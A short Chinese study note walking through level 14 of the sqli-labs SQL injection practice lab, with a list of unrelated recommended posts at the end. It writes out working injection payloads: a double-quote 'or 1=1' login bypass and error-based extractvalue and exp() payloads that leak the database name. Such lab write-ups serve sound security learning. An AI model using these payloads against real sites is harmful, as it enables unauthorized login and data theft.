sqllab第十四关通关笔记

知识点:

  • 错误注入
  • 这里的语法是 where username=""
  • 直接进行双引号绕过

通过admin admin登录发现还是没有任何回显

通过bp进行抓包;测试输入内容

构造payload:username=a'+or+1=1#

发现不能成功登录

尝试换成双引号

构造payload:username=a"+or+1=1#

成功登录了

尝试进行错误注入

构造payload:username=a"+or+exp(710)#

错误成功打印到页面上了

尝试利用错误注入获取数据库名

构造payload:username=a"+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名

到这里就结束了,利用错误注入获取数据库中其他敏感信息在最开始的几关实验过了

10

相关推荐
两颗泡腾片27 分钟前
黑马程序员C++核心编程笔记--类和对象--运算符重载
c++·笔记
致***锌2 小时前
上证50ETF期权的交易时间是什么时候?
笔记
thginWalker2 小时前
图解网络-小林coding笔记(持续更新)
网络·笔记
草堂春睡足4 小时前
【Datawhale AI夏令营】科大讯飞AI大赛(大模型技术)/夏令营:让AI理解列车排期表
人工智能·笔记
Olrookie5 小时前
若依前后端分离版学习笔记(一)——本地部署
笔记·后端·开源
##echo6 小时前
嵌入式Linux裸机开发笔记9(IMX6ULL)GPIO 中断实验(1)
linux·c语言·笔记·单片机·嵌入式硬件
我爱学嵌入式9 小时前
C语言第 9 天学习笔记:数组(二维数组与字符数组)
c语言·笔记·学习
_Kayo_17 小时前
VUE2 学习笔记6 vue数据监测原理
vue.js·笔记·学习
使二颗心免于哀伤19 小时前
《设计模式之禅》笔记摘录 - 10.装饰模式
笔记·设计模式
悠哉悠哉愿意19 小时前
【电赛学习笔记】MaxiCAM 项目实践——与单片机的串口通信
笔记·python·单片机·嵌入式硬件·学习·视觉检测